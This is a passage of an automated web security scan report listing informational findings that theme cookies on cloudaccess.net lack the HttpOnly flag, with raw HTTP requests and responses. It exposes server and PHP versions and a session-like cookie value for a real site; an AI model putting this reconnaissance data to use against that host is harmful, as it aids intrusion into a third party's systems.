Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Last-Modified: Wed, 30 Jun 2010 17:55:06 GMT
Expires: Mon, 24 Jan 2011 14:07:48 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.714. http://www.cloudaccess.net/support-sla.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /support-sla.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:52 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support-sla.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:53 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:52 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:53 GMT; path=/
Last-Modified: Mon, 22 Nov 2010 16:52:12 GMT
Expires: Mon, 24 Jan 2011 14:07:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.715. http://www.cloudaccess.net/terms-of-service.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /terms-of-service.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /terms-of-service.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:47 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Last-Modified: Fri, 02 Jul 2010 09:07:32 GMT
Expires: Mon, 24 Jan 2011 14:07:48 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.716. http://www.cloudaccess.net/trial.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /trial.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trial.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Last-Modified: Tue, 03 Aug 2010 04:44:41 GMT
Expires: Mon, 24 Jan 2011 14:07:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.717. https://www.cloudaccess.net/copyright-policy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /copyright-policy.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:43 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /copyright-policy.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:43 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Last-Modified: Wed, 30 Jun 2010 18:23:53 GMT
Expires: Mon, 24 Jan 2011 16:19:44 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.718. https://www.cloudaccess.net/network-report.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /network-report.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:43 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /network-report.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:44 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Last-Modified: Thu, 23 Dec 2010 04:28:12 GMT
Expires: Mon, 24 Jan 2011 16:19:44 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.719. https://www.cloudaccess.net/network-sla.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /network-sla.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:45 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /network-sla.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:46 GMT; path=/
Last-Modified: Tue, 30 Nov 1999 06:00:00 GMT
Expires: Mon, 24 Jan 2011 16:19:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.720. https://www.cloudaccess.net/privacy-policy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /privacy-policy.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy-policy.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:41 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
